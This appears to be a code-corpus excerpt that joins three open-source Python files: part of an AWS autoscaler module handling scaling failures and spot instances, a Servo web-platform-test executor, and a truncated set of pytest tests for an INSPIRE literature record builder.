datetime.timedelta(seconds=self._TIMEOUT))
if activity['StartTime'] < start_time_cutoff:
# skip events that are too old to cut down the time
# it takes the first time to go through events
break
activities.setdefault(activity['AutoScalingGroupName'], []).append(activity)
self._last_activities[region] = newest_completed_activity['ActivityId']
for asg in regional_asgs:
self.reconcile_limits(asg, activities.get(asg.name, []), dry_run=dry_run)
def iter_activities(self, client):
next_token = None
while True:
kwargs = {}
if next_token:
kwargs['NextToken'] = next_token
data = client.describe_scaling_activities(**kwargs)
for item in data['Activities']:
yield item
next_token = data.get('NextToken')
if not next_token:
break
def revert_capacity(self, asg, entry, dry_run):
"""
try to decrease desired capacity to the original
capacity before the capacity increase that caused
the ASG activity entry.
"""
cause_m = AutoScalingCauseMessages.LAUNCH_INSTANCE.search(entry.get('Cause', ''))
if cause_m:
original_capacity = int(cause_m.group('original_capacity'))
if asg.desired_capacity > original_capacity:
# we tried to go over capacity and failed
# now set the desired capacity back to a normal range
if not dry_run:
asg.set_desired_capacity(original_capacity)
else:
logger.info('[Dry run] Would have set desired capacity to %s', original_capacity)
return True
return False
def time_out_asg(self, asg, entry):
self._timeouts[asg._id] = (
entry['StartTime'] + datetime.timedelta(seconds=self._TIMEOUT))
logger.info('%s is timed out until %s',
asg.name, self._timeouts[asg._id])
def reconcile_limits(self, asg, activities, dry_run=False):
"""
makes sure the ASG has valid capacity by processing errors
in its recent scaling activities.
marks an ASG as timed out if it recently had a capacity
failure.
"""
for entry in activities:
status_msg = entry.get('StatusMessage', '')
if entry['StatusCode'] in ('Failed', 'Cancelled'):
logger.warn('%s scaling failure: %s', asg, entry)
m = AutoScalingErrorMessages.INSTANCE_LIMIT.match(status_msg)
if m:
max_desired_capacity = int(m.group('requested')) - 1
if asg.desired_capacity > max_desired_capacity:
self.time_out_asg(asg, entry)
# we tried to go over capacity and failed
# now set the desired capacity back to a normal range
if not dry_run:
asg.set_desired_capacity(max_desired_capacity)
else:
logger.info('[Dry run] Would have set desired capacity to %s', max_desired_capacity)
return
m = AutoScalingErrorMessages.VOLUME_LIMIT.match(status_msg)
if m:
# TODO: decrease desired capacity
self.time_out_asg(asg, entry)
return
m = AutoScalingErrorMessages.CAPACITY_LIMIT.match(status_msg)
if m:
reverted = self.revert_capacity(asg, entry, dry_run)
if reverted:
self.time_out_asg(asg, entry)
return
m = AutoScalingErrorMessages.AZ_LIMIT.search(status_msg)
if m and 'only-az' in asg.name:
reverted = self.revert_capacity(asg, entry, dry_run)
if reverted:
self.time_out_asg(asg, entry)
return
m = AutoScalingErrorMessages.SPOT_REQUEST_CANCELLED.search(status_msg)
if m:
# we cancelled a spot request
# don't carry on to reset timeout
continue
m = AutoScalingErrorMessages.SPOT_LIMIT.match(status_msg)
if m:
self.time_out_asg(asg, entry)
if not dry_run:
asg.set_desired_capacity(asg.actual_capacity)
else:
logger.info('[Dry run] Would have set desired capacity to %s', asg.actual_capacity)
return
elif entry['StatusCode'] == 'WaitingForSpotInstanceId':
logger.warn('%s waiting for spot: %s', asg, entry)
balance_cause_m = AutoScalingCauseMessages.AZ_BALANCE.search(entry.get('Cause', ''))
if balance_cause_m:
# sometimes ASGs will launch instances in other az's to
# balance out the group
# ignore these events
# even if we cancel it, the ASG will just attempt to
# launch again
logger.info('ignoring AZ balance launch event')
continue
now = datetime.datetime.now(entry['StartTime'].tzinfo)
if (now - entry['StartTime']) > datetime.timedelta(seconds=self._SPOT_REQUEST_TIMEOUT):
self.time_out_asg(asg, entry)
# try to cancel spot request and scale down ASG
spot_request_m = AutoScalingErrorMessages.SPOT_REQUEST_WAITING.search(status_msg)
if spot_request_m:
spot_request_id = spot_request_m.group('request_id')
if not dry_run:
cancelled = self.cancel_spot_request(asg.region, spot_request_id)
if cancelled:
asg.set_desired_capacity(asg.desired_capacity - 1)
else:
logger.info('[Dry run] Would have cancelled spot request %s and decremented desired capacity.',
spot_request_id)
# don't return here so that we can cancel more spot requests
self._timeouts[asg._id] = None
logger.debug('%s has no timeout', asg.name)
def is_timed_out(self, asg):
timeout = self._timeouts.get(asg._id)
spot_timeout = self._spot_timeouts.get(asg._id)
if timeout and datetime.datetime.now(timeout.tzinfo) < timeout:
return True
if spot_timeout and datetime.datetime.now(pytz.utc) < spot_timeout:
return True
return False
def cancel_spot_request(self, region, request_id):
client = self.session.client('ec2',
region_name=region)
response = client.describe_spot_instance_requests(
SpotInstanceRequestIds=[request_id]
)
if len(response['SpotInstanceRequests']) == 0:
return False
spot_instance_req = response['SpotInstanceRequests'][0]
if spot_instance_req['State'] in ('open', 'active'):
response = client.cancel_spot_instance_requests(
SpotInstanceRequestIds=[request_id]
)
logger.info('Spot instance request %s cancelled.', request_id)
return True
return False
def time_out_spot_asgs(self, asgs):
"""
Using recent spot pricing data from AWS, time out spot instance
ASGs that would be outbid for more than _MAX_OUTBIDS_IN_INTERVAL seconds
"""
region_instance_asg_map = {}
for asg in asgs:
if not asg.is_spot:
continue
instance_asg_map = region_instance_asg_map.setdefault(asg.region, {})
instance_type = asg.launch_config['InstanceType']
instance_asg_map.setdefault(instance_type, []).append(asg)
now = datetime.datetime.now(pytz.utc)
since = now - datetime.timedelta(seconds=self._SPOT_HISTORY_PERIOD)
for region, instance_asg_map in region_instance_asg_map.items():
# Expire old history
history = [item for item in self._spot_price_history.get(region, []) if item['Timestamp'] > since]
if history:
newest_spot_price = max(item['Timestamp'] for item in history)
else:
newest_spot_price = since
client = self.session.client('ec2', region_name=region)
kwargs = {
'StartTime': newest_spot_price,
'InstanceTypes': list(instance_asg_map.keys()),
'ProductDescriptions': ['Linux/UNIX']
}
history.extend(aws_utils.fetch_all(
client.describe_spot_price_history, kwargs, 'SpotPriceHistory'))
self._spot_price_history[region] = history
for instance_type, asgs in instance_asg_map.items():
for asg in asgs:
last_az_bid = {}
outbid_time = {}
bid_price = float(asg.launch_config['SpotPrice'])
for item in history:
if item['InstanceType'] != instance_type:
continue
if float(item['SpotPrice']) > bid_price:
# we would've been outbid!
if item['AvailabilityZone'] in last_az_bid:
time_diff = (last_az_bid[item['AvailabilityZone']] - item['Timestamp'])
else:
time_diff = datetime.timedelta(seconds=0)
outbid_time[item['AvailabilityZone']] = (
outbid_time.get(item['AvailabilityZone'], datetime.timedelta(seconds=0)) +
time_diff)
last_az_bid[item['AvailabilityZone']] = item['Timestamp']
if outbid_time:
avg_outbid_time = sum(t.total_seconds() for t in outbid_time.values()) / len(outbid_time)
else:
avg_outbid_time = 0.0
if avg_outbid_time > self._MAX_OUTBIDS_IN_INTERVAL:
self._spot_timeouts[asg._id] = now + datetime.timedelta(seconds=self._TIMEOUT)
logger.info('%s (%s) is spot timed out until %s (would have been outbid for %ss on average)',
asg.name, asg.region, self._spot_timeouts[asg._id], avg_outbid_time)
else:
self._spot_timeouts[asg._id] = None
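        # Worked example (prices and times are hypothetical, and assume the history is
        # returned newest-first, as the loop above relies on): with a bid of $0.10 and
        # one AZ whose price sat above the bid at two history points 20 minutes apart,
        # that AZ accumulates 20 minutes of outbid_time; the average (1200s) is then
        # compared against _MAX_OUTBIDS_IN_INTERVAL, and only a strictly larger value
        # triggers the spot timeout for the ASG.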
class AutoScalingGroup(object):
provider = 'aws'
def __init__(self, client, region, kube_nodes, raw_group, launch_config):
"""
client - boto3 AutoScaling.Client
region - AWS region string
kube_nodes - list of KubeNode objects
raw_group - raw ASG dictionary returned from AWS API
launch_config - raw launch config dictionary returned from AWS API
"""
self.client = client
self.region = region
self.launch_config = launch_config
self.selectors = self._extract_selectors(region, launch_config, raw_group['Tags'])
self.name = raw_group['AutoScalingGroupName']
self.desired_capacity = raw_group['DesiredCapacity']
self.min_size = raw_group['MinSize']
self.max_size = raw_group['MaxSize']
self.is_spot = launch_config.get('SpotPrice') is not None
self.instance_type = launch_config['InstanceType']
self.instance_ids = set(inst['InstanceId'] for inst in raw_group['Instances']
if inst.get('InstanceId'))
self.nodes = [node for node in kube_nodes
if node.instance_id in self.instance_ids]
self.unschedulable_nodes = [n for n in self.nodes if n.unschedulable]
self.no_schedule_taints = {}
self._id = (self.region, self.name)
def _extract_selectors(self, region, launch_config, tags_data):
selectors = {
'aws/type': launch_config['InstanceType'],
'aws/class': launch_config['InstanceType'][0],
'aws/ami-id': launch_config['ImageId'],
'aws/region': region
}
for tag_data in tags_data:
if tag_data['Key'].startswith('kube/'):
selectors[tag_data['Key'][5:]] = tag_data['Value']
# adding kube label counterparts
selectors['beta.kubernetes.io/instance-type'] = selectors['aws/type']
selectors['failure-domain.beta.kubernetes.io/region'] = selectors['aws/region']
return selectors
def is_timed_out(self):
return False
@property
def global_priority(self):
return 0
@property
def actual_capacity(self):
return len(self.nodes)
def set_desired_capacity(self, new_desired_capacity):
"""
sets the desired capacity of the underlying ASG directly.
note that this is for internal control.
for scaling purposes, please use scale() instead.
"""
logger.info("ASG: {} new_desired_capacity: {}".format(
self, new_desired_capacity))
self.client.set_desired_capacity(AutoScalingGroupName=self.name,
DesiredCapacity=new_desired_capacity,
HonorCooldown=False)
self.desired_capacity = new_desired_capacity
return utils.CompletedFuture(True)
def scale(self, new_desired_capacity):
"""
scales the ASG to the new desired capacity.
returns a future with the result True if desired capacity has been increased.
"""
desired_capacity = min(self.max_size, new_desired_capacity)
num_unschedulable = len(self.unschedulable_nodes)
num_schedulable = self.actual_capacity - num_unschedulable
logger.info("Desired {}, currently at {}".format(
desired_capacity, self.desired_capacity))
logger.info("Kube node: {} schedulable, {} unschedulable".format(
num_schedulable, num_unschedulable))
# Try to get the number of schedulable nodes up if we don't have enough, regardless of whether
# group's capacity is already at the same as the desired.
if num_schedulable < desired_capacity:
for node in self.unschedulable_nodes:
if node.uncordon():
num_schedulable += 1
# Uncordon only what we need
if num_schedulable == desired_capacity:
break
if self.desired_capacity != desired_capacity:
if self.desired_capacity == self.max_size:
logger.info("Desired same as max, desired: {}, schedulable: {}".format(
self.desired_capacity, num_schedulable))
return utils.CompletedFuture(False)
scale_up = self.desired_capacity < desired_capacity
# This should be a rare event
# note: this micro-optimization is not worth doing as the race condition here is
# tricky. when ec2 initializes some nodes in the meantime, asg will shutdown
# nodes by its own policy
# scale_down = self.desired_capacity > desired_capacity >= self.actual_capacity
if scale_up:
# should have gotten our num_schedulable to highest value possible
# actually need to grow.
return self.set_desired_capacity(desired_capacity)
logger.info("Doing nothing: desired_capacity correctly set: {}, schedulable: {}".format(
self.name, num_schedulable))
return utils.CompletedFuture(False)
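    # Illustrative usage (a hypothetical sketch, assuming `asg` came from
    # AutoScalingGroups.get_all_groups()):
    #
    #     future = asg.scale(asg.desired_capacity + 1)  # uncordon first, then grow if needed
    #     future.result()                               # futures here resolve immediately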
def scale_nodes_in(self, nodes):
"""
scale down asg by terminating the given node.
returns a future indicating when the request completes.
"""
for node in nodes:
try:
# if we somehow end up in a situation where we have
# more capacity than desired capacity, and the desired
# capacity is at asg min size, then when we try to
# terminate the instance while decrementing the desired
# capacity, the aws api call will fail
decrement_capacity = self.desired_capacity > self.min_size
self.client.terminate_instance_in_auto_scaling_group(
InstanceId=node.instance_id,
ShouldDecrementDesiredCapacity=decrement_capacity)
self.nodes.remove(node)
logger.info('Scaled node %s in', node)
except botocore.exceptions.ClientError as e:
if str(e).find("Terminating instance without replacement will "
"violate group's min size constraint.") == -1:
raise e
logger.error("Failed to terminate instance: %s", e)
return utils.CompletedFuture(None)
def contains(self, node):
return node.instance_id in self.instance_ids
def is_match_for_selectors(self, selectors):
for label, value in selectors.items():
if self.selectors.get(label) != value:
return False
return True
def is_taints_tolerated(self, pod):
for label, value in pod.selectors.items():
if self.selectors.get(label) != value:
return False
for key in self.no_schedule_taints:
if not (pod.no_schedule_wildcard_toleration or key in pod.no_schedule_existential_tolerations):
return False
return True
def __str__(self):
return 'AutoScalingGroup({name}, {selectors_hash})'.format(name=self.name, selectors_hash=utils.selectors_to_hash(self.selectors))
def __repr__(self):
return str(self)
class AutoScalingErrorMessages(object):
INSTANCE_LIMIT = re.compile(r'You have requested more instances \((?P<requested>\d+)\) than your current instance limit of (?P<limit>\d+) allows for the specified instance type. Please visit http://aws.amazon.com/contact-us/ec2-request to request an adjustment to this limit. Launching EC2 instance failed.')
VOLUME_LIMIT = re.compile(r'Instance became unhealthy while waiting for instance to be in InService state. Termination Reason: Client.VolumeLimitExceeded: Volume limit exceeded')
CAPACITY_LIMIT = re.compile(r'Insufficient capacity\. Launching EC2 instance failed\.')
SPOT_REQUEST_WAITING = re.compile(r'Placed Spot instance request: (?P<request_id>.+). Waiting for instance\(s\)')
SPOT_REQUEST_CANCELLED = re.compile(r'Spot instance request: (?P<request_id>.+) has been cancelled\.')
SPOT_LIMIT = re.compile(r'Max spot instance count exceeded\. Placing Spot instance request failed\.')
AZ_LIMIT = re.compile(r'We currently do not have sufficient .+ capacity in the Availability Zone you requested (.+)\.')
class AutoScalingCauseMessages(object):
LAUNCH_INSTANCE = re.compile(r'At \d\d\d\d-\d\d-\d\dT\d\d:\d\d:\d\dZ an instance was started in response to a difference between desired and actual capacity, increasing the capacity from (?P<original_capacity>\d+) to (?P<target_capacity>\d+)\.')
AZ_BALANCE = re.compile(r'An instance was launched to aid in balancing the group\'s zones\.')
| openai/kubernetes-ec2-autoscaler | autoscaler/autoscaling_groups.py | Python | mit | 24,754 |
import base64
import json
import os
import subprocess
import tempfile
import threading
import uuid
from mozprocess import ProcessHandler
from serve.serve import make_hosts_file
from .base import (ConnectionlessProtocol,
RefTestImplementation,
testharness_result_converter,
reftest_result_converter,
WdspecExecutor,
WebDriverProtocol)
from .process import ProcessTestExecutor
from ..browsers.base import browser_command
from ..webdriver_server import ServoDriverServer
pytestrunner = None
webdriver = None
extra_timeout = 5 # seconds
def write_hosts_file(config):
hosts_fd, hosts_path = tempfile.mkstemp()
with os.fdopen(hosts_fd, "w") as f:
f.write(make_hosts_file(config, "127.0.0.1"))
return hosts_path
class ServoTestharnessExecutor(ProcessTestExecutor):
convert_result = testharness_result_converter
def __init__(self, browser, server_config, timeout_multiplier=1, debug_info=None,
pause_after_test=False, **kwargs):
ProcessTestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.pause_after_test = pause_after_test
self.result_data = None
self.result_flag = None
self.protocol = ConnectionlessProtocol(self, browser)
self.hosts_path = write_hosts_file(server_config)
def teardown(self):
try:
os.unlink(self.hosts_path)
except OSError:
pass
ProcessTestExecutor.teardown(self)
def do_test(self, test):
self.result_data = None
self.result_flag = threading.Event()
args = [
"--hard-fail", "-u", "Servo/wptrunner",
"-Z", "replace-surrogates", "-z", self.test_url(test),
]
for stylesheet in self.browser.user_stylesheets:
args += ["--user-stylesheet", stylesheet]
for pref, value in test.environment.get('prefs', {}).iteritems():
args += ["--pref", "%s=%s" % (pref, value)]
if self.browser.ca_certificate_path:
args += ["--certificate-path", self.browser.ca_certificate_path]
args += self.browser.binary_args
debug_args, command = browser_command(self.binary, args, self.debug_info)
self.command = command
if self.pause_after_test:
self.command.remove("-z")
self.command = debug_args + self.command
env = os.environ.copy()
env["HOST_FILE"] = self.hosts_path
env["RUST_BACKTRACE"] = "1"
if not self.interactive:
self.proc = ProcessHandler(self.command,
processOutputLine=[self.on_output],
onFinish=self.on_finish,
env=env,
storeOutput=False)
self.proc.run()
else:
self.proc = subprocess.Popen(self.command, env=env)
try:
timeout = test.timeout * self.timeout_multiplier
# Now wait to get the output we expect, or until we reach the timeout
if not self.interactive and not self.pause_after_test:
wait_timeout = timeout + 5
self.result_flag.wait(wait_timeout)
else:
wait_timeout = None
self.proc.wait()
proc_is_running = True
if self.result_flag.is_set():
if self.result_data is not None:
result = self.convert_result(test, self.result_data)
else:
self.proc.wait()
result = (test.result_cls("CRASH", None), [])
proc_is_running = False
else:
result = (test.result_cls("TIMEOUT", None), [])
if proc_is_running:
if self.pause_after_test:
self.logger.info("Pausing until the browser exits")
self.proc.wait()
else:
self.proc.kill()
except KeyboardInterrupt:
self.proc.kill()
raise
return result
def on_output(self, line):
prefix = "ALERT: RESULT: "
line = line.decode("utf8", "replace")
if line.startswith(prefix):
self.result_data = json.loads(line[len(prefix):])
self.result_flag.set()
else:
if self.interactive:
print line
else:
self.logger.process_output(self.proc.pid,
line,
" ".join(self.command))
def on_finish(self):
self.result_flag.set()
class TempFilename(object):
def __init__(self, directory):
self.directory = directory
self.path = None
def __enter__(self):
self.path = os.path.join(self.directory, str(uuid.uuid4()))
return self.path
def __exit__(self, *args, **kwargs):
try:
os.unlink(self.path)
except OSError:
pass
class ServoRefTestExecutor(ProcessTestExecutor):
convert_result = reftest_result_converter
def __init__(self, browser, server_config, binary=None, timeout_multiplier=1,
screenshot_cache=None, debug_info=None, pause_after_test=False,
**kwargs):
ProcessTestExecutor.__init__(self,
browser,
server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.protocol = ConnectionlessProtocol(self, browser)
self.screenshot_cache = screenshot_cache
self.implementation = RefTestImplementation(self)
self.tempdir = tempfile.mkdtemp()
self.hosts_path = write_hosts_file(server_config)
def teardown(self):
try:
os.unlink(self.hosts_path)
except OSError:
pass
os.rmdir(self.tempdir)
ProcessTestExecutor.teardown(self)
def screenshot(self, test, viewport_size, dpi):
full_url = self.test_url(test)
with TempFilename(self.tempdir) as output_path:
debug_args, command = browser_command(
self.binary,
[
"--hard-fail", "--exit",
"-u", "Servo/wptrunner",
"-Z", "disable-text-aa,load-webfonts-synchronously,replace-surrogates",
"--output=%s" % output_path, full_url
] + self.browser.binary_args,
self.debug_info)
for stylesheet in self.browser.user_stylesheets:
command += ["--user-stylesheet", stylesheet]
for pref, value in test.environment.get('prefs', {}).iteritems():
command += ["--pref", "%s=%s" % (pref, value)]
command += ["--resolution", viewport_size or "800x600"]
if self.browser.ca_certificate_path:
command += ["--certificate-path", self.browser.ca_certificate_path]
if dpi:
command += ["--device-pixel-ratio", dpi]
# Run ref tests in headless mode
command += ["-z"]
self.command = debug_args + command
env = os.environ.copy()
env["HOST_FILE"] = self.hosts_path
env["RUST_BACKTRACE"] = "1"
if not self.interactive:
self.proc = ProcessHandler(self.command,
processOutputLine=[self.on_output],
env=env)
try:
self.proc.run()
timeout = test.timeout * self.timeout_multiplier + 5
rv = self.proc.wait(timeout=timeout)
except KeyboardInterrupt:
self.proc.kill()
raise
else:
self.proc = subprocess.Popen(self.command,
env=env)
try:
rv = self.proc.wait()
except KeyboardInterrupt:
self.proc.kill()
raise
if rv is None:
self.proc.kill()
return False, ("EXTERNAL-TIMEOUT", None)
if rv != 0 or not os.path.exists(output_path):
return False, ("CRASH", None)
with open(output_path) as f:
# Might need to strip variable headers or something here
data = f.read()
return True, base64.b64encode(data)
def do_test(self, test):
result = self.implementation.run_test(test)
return self.convert_result(test, result)
def on_output(self, line):
line = line.decode("utf8", "replace")
if self.interactive:
print line
else:
self.logger.process_output(self.proc.pid,
line,
" ".join(self.command))
class ServoDriverProtocol(WebDriverProtocol):
server_cls = ServoDriverServer
class ServoWdspecExecutor(WdspecExecutor):
protocol_cls = ServoDriverProtocol
| dati91/servo | tests/wpt/web-platform-tests/tools/wptrunner/wptrunner/executors/executorservo.py | Python | mpl-2.0 | 9,499 |
# -*- coding: utf-8 -*-
#
# This file is part of INSPIRE-SCHEMAS.
# Copyright (C) 2016, 2019 CERN.
#
# INSPIRE-SCHEMAS is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# INSPIRE-SCHEMAS is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE-SCHEMAS; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
import pytest
from jsonschema import ValidationError
from inspire_schemas.builders.literature import LiteratureBuilder, is_citeable
from inspire_schemas.utils import load_schema, validate
@pytest.mark.parametrize(
'expected_result,formdata',
[
(
True,
[
{
'journal_title': 'High Energy Physics Libraries Webzine',
'journal_volume': '192',
'artid': '2550'
}
]
), (
True,
[
{
'journal_title': 'High Energy Physics Libraries Webzine',
'journal_volume': '192',
'page_start': '28'
}
]
), (
False,
[
{
'journal_title': 'High Energy Physics Libraries Webzine',
'journal_volume': '192',
}
]
), (
False,
[
{
'journal_title': 'High Energy Physics Libraries Webzine',
'page_start': '25'
}
]
)
]
)
def test_is_citeable(expected_result, formdata):
assert is_citeable(formdata) is expected_result
def test_append_to():
formdata = ''
builder = LiteratureBuilder("test")
expected_result = None
builder._append_to('test_field', formdata)
assert builder.record.get('test_field') is expected_result
formdata = 'value'
expected_result = ['value']
builder._append_to('test_field_2', formdata)
assert builder.record.get('test_field_2') == expected_result
def test_sourced_dict_local_source():
builder = LiteratureBuilder('global')
expected = {
'source': 'local',
'value': 'foo'
}
result = builder._sourced_dict('local', value='foo')
assert result == expected
def test_sourced_dict_global_source():
builder = LiteratureBuilder('global')
expected = {
'source': 'global',
'value': 'foo'
}
result = builder._sourced_dict(None, value='foo')
assert result == expected
def test_sourced_dict_no_source():
builder = LiteratureBuilder()
expected = {
'value': 'foo'
}
result = builder._sourced_dict(None, value='foo')
assert result == expected
def test_add_figure():
schema = load_schema('hep')
subschema = schema['properties']['figures']
builder = LiteratureBuilder('test')
builder.add_figure(
'key',
caption='caption',
label='label',
material='publication',
source='source',
url='https://www.example.com/url',
description='description',
filename='filename',
original_url='http://www.example.com/original_url'
)
expected = [
{
'caption': 'caption',
'key': 'key',
'label': 'label',
'material': 'publication',
'source': 'source',
'url': 'https://www.example.com/url',
'filename': 'filename',
'original_url': 'http://www.example.com/original_url'
},
]
result = builder.record
assert validate(result['figures'], subschema) is None
assert expected == result['figures']
for key in subschema['items']['properties'].keys():
assert key in result['figures'][0]
def test_add_figure_inspire_next():
schema = load_schema('hep')
subschema = schema['properties']['figures']
builder = LiteratureBuilder('test')
builder.add_figure(
'key',
caption='caption',
label='label',
material='publication',
source='source',
url='/api/files/a1/123',
description='description',
original_url='http://www.example.com/original_url'
)
expected = [
{
'caption': 'caption',
'key': 'key',
'label': 'label',
'material': 'publication',
'source': 'source',
'url': '/api/files/a1/123',
'original_url': 'http://www.example.com/original_url'
},
]
result = builder.record
assert validate(result['figures'], subschema) is None
assert expected == result['figures']
def test_add_figure_fails_on_duplicated_key():
builder = LiteratureBuilder('test')
builder.add_figure(
'key',
caption='caption',
label='label',
material='publication',
source='source',
url='url',
description='description',
filename='filename',
original_ur='original_url'
)
with pytest.raises(ValueError):
builder.add_figure(
'key',
caption='caption',
label='label',
material='publication',
source='source',
url='url',
description='description',
filename='filename',
original_ur='original_url'
)
def test_add_figure_fails_on_non_file_api_relative_url():
schema = load_schema('hep')
subschema = schema['properties']['figures']
builder = LiteratureBuilder('test')
with pytest.raises(ValidationError):
builder.add_figure(
'key',
caption='caption',
label='label',
material='publication',
source='source',
url='/not/api/url/for/files',
description='description',
original_url='http://www.example.com/original_url'
)
result = builder.record
validate(result['figures'], subschema)
def test_add_document():
schema = load_schema('hep')
subschema = schema['properties']['documents']
builder = LiteratureBuilder('test')
builder.add_document(
'key',
description='description',
fulltext=True,
hidden=True,
material='preprint',
original_url='http://www.example.com/original_url',
source='source',
url='https://www.example.com/url',
filename='filename'
)
expected = [
{
'description': 'description',
'fulltext': True,
'hidden': True,
'key': 'key',
'material': 'preprint',
'original_url': 'http://www.example.com/original_url',
'source': 'source',
'url': 'https://www.example.com/url',
'filename': 'filename'
},
]
result = builder.record
assert validate(result['documents'], subschema) is None
assert expected == result['documents']
for key in subschema['items']['properties'].keys():
assert key in result['documents'][0]
def test_add_document_inspire_next():
schema = load_schema('hep')
subschema = schema['properties']['documents']
builder = LiteratureBuilder('test')
builder.add_document(
'key',
description='description',
fulltext=True,
hidden=True,
material='preprint',
original_url='http://www.example.com/original_url',
source='source',
url='/api/files/a1/123',
)
expected = [
{
'description': 'description',
'fulltext': True,
'hidden': True,
'key': 'key',
'material': 'preprint',
'original_url': 'http://www.example.com/original_url',
'source': 'source',
'url': '/api/files/a1/123',
},
]
result = builder.record
assert validate(result['documents'], subschema) is None
assert expected == result['documents']
def test_add_document_fails_on_existing_key():
builder = LiteratureBuilder('test')
builder.add_document(
'key',
description='description',
fulltext=True,
hidden=True,
material='preprint',
original_url='http://www.example.com/original_url',
source='source',
url='url',
filename='filename'
)
with pytest.raises(ValueError):
builder.add_document(
'key',
description='description',
fulltext=True,
hidden=True,
material='preprint',
original_url='http://www.example.com/original_url',
source='source',
url='url',
filename='filename'
)
def test_add_document_fails_on_non_file_api_relative_url():
schema = load_schema('hep')
subschema = schema['properties']['documents']
builder = LiteratureBuilder('test')
with pytest.raises(ValidationError):
builder.add_document(
'key',
description='description',
fulltext=True,
hidden=True,
material='preprint',
original_url='http://www.example.com/original_url',
source='source',
url='/not/api/url/for/files',
filename='filename'
)
result = builder.record
validate(result['documents'], subschema)
def test_make_author():
schema = load_schema('hep')
subschema = schema['properties']['authors']
builder = LiteratureBuilder()
result = builder.make_author(
'Smith, John',
affiliations=['CERN', 'SLAC'],
source='submitter',
raw_affiliations=['CERN, 1211 Geneva', 'SLAC, Stanford'],
emails=['[email protected]'],
ids=[('INSPIRE BAI', 'J.Smith.1')],
alternative_names=['Johnny Smith']
)
expected = {
'full_name': 'Smith, John',
'affiliations': [
{'value': 'CERN'},
{'value': 'SLAC'},
],
'raw_affiliations': [
{
'value': 'CERN, 1211 Geneva',
'source': 'submitter'
},
{
'value': 'SLAC, Stanford',
'source': 'submitter',
}
],
'emails': ['[email protected]'],
'ids': [
{
'schema': 'INSPIRE BAI',
'value': 'J.Smith.1',
}
],
'alternative_names': ['Johnny Smith'],
}
assert validate([result], subschema) is None
assert expected == result
def test_add_keyword():
schema = load_schema('hep')
subschema = schema['properties']['keywords']
builder = LiteratureBuilder(source='Publisher')
builder.add_keyword('29.27.Fh', schema='PACS')
result = builder.record['keywords']
expected = [
{
'value': '29.27.Fh',
'schema': 'PACS',
'source': 'Publisher',
}
]
assert validate(result, subschema) is None
assert expected == result
def test_field_not_added_when_only_material():
builder = LiteratureBuilder(source='Publisher')
builder.add_publication_info(material='Publication')
assert 'publication_info' not in builder.record
def test_add_doi_handles_none():
builder = LiteratureBuilder()
builder.add_doi(None)
result = builder.record
assert 'dois' not in result
def test_add_doi_normalizes_doi():
schema = load_schema('hep')
subschema = schema['properties']['dois']
builder = LiteratureBuilder()
builder.add_doi('doi.org/10.1234/foo')
result = builder.record['dois']
expected = [
{
'value': '10.1234/foo',
}
]
assert validate(result, subschema) is None
assert expected == result
def test_add_doi_with_invalid_value():
builder = LiteratureBuilder()
builder.add_doi('invalid doi value, ignore me')
result = builder.record
assert 'dois' not in result
def test_add_license_doesnt_overwrite_name_if_no_url():
schema = load_schema('hep')
subschema = schema['properties']['license']
builder = LiteratureBuilder()
builder.add_license(license='foo')
result = builder.record['license']
expected = [
{
'license': 'foo',
}
]
assert validate(result, subschema) is None
assert expected == result
def test_repr_handles_source_none():
builder = LiteratureBuilder()
assert repr(builder).startswith('LiteratureBuilder(source=None, record={')
def test_repr_handles_source_present():
builder = LiteratureBuilder('publisher')
assert repr(builder).startswith(
"LiteratureBuilder(source='publisher', record={"
)
def test_add_reference():
builder = LiteratureBuilder()
reference = {
"reference": {
"authors": [
{
"full_name": "Smith, J."
}
],
"label": "1",
"publication_info": {
"year": 1996
}
}
}
builder.add_reference(reference)
assert builder.record['references'] == [reference]
def test_add_accelerator_experiment():
builder = LiteratureBuilder()
legacy_name = 'FNAL-E-0900'
experiment_record = {'$ref': 'http://url/api/experiments/123'}
builder.add_accelerator_experiment('FNAL-E-0900', record=experiment_record)
assert builder.record['accelerator_experiments'] == [{
'legacy_name': legacy_name,
'record': experiment_record
}]
def test_publication_info_public_note():
schema = load_schema('hep')
subschema = schema['properties']['public_notes']
builder = LiteratureBuilder(source="APS")
builder.add_publication_info(journal_title="Phys. Rev. B")
expected = [
{
'source': 'APS',
'value': 'Submitted to Phys. Rev. B',
}
]
result = builder.record['public_notes']
assert validate(result, subschema) is None
assert expected == result
assert 'publication_info' not in builder.record
def test_preprint_date_normalizes_date():
builder = LiteratureBuilder()
builder.add_preprint_date('12 April 2010')
result = builder.record['preprint_date']
expected = '2010-04-12'
assert expected == result
def test_imprint_date_normalizes_date():
builder = LiteratureBuilder()
builder.add_imprint_date('19 September 2005')
result = builder.record['imprints']
expected = [
{
'date': '2005-09-19'
}
]
assert expected == result
def test_add_book_normalizes_date():
builder = LiteratureBuilder()
builder.add_book(date='9 November 1990')
result = builder.record['imprints']
expected = [
{
'date': '1990-11-09'
}
]
assert expected == result
def test_add_isbn_normalizes_isbn():
builder = LiteratureBuilder()
builder.add_isbn(isbn='978-3-642-23908-3')
result = builder.record['isbns']
expected = [
{
'value': '9783642239083'
}
]
assert expected == result
def test_add_parent_isbn_normalizes_isbn():
builder = LiteratureBuilder()
builder.add_publication_info(parent_isbn='978-3-642-23908-3')
result = builder.record['publication_info']
expected = [
{
'parent_isbn': '9783642239083'
}
]
assert expected == result
def test_make_author_handles_none_in_id_value():
schema = load_schema('hep')
subschema = schema['properties']['authors']
builder = LiteratureBuilder()
result = builder.make_author(
'Smith, John',
ids=[('INSPIRE BAI', None)],
)
expected = {
'full_name': 'Smith, John',
}
assert validate([result], subschema) is None
assert expected == result
def test_make_author_sets_record():
schema = load_schema('hep')
subschema = schema['properties']['authors']
builder = LiteratureBuilder()
author_record = {'$ref': 'http://url/api/authors/1234'}
result = builder.make_author(
'Smith, John',
record=author_record,
)
expected = {
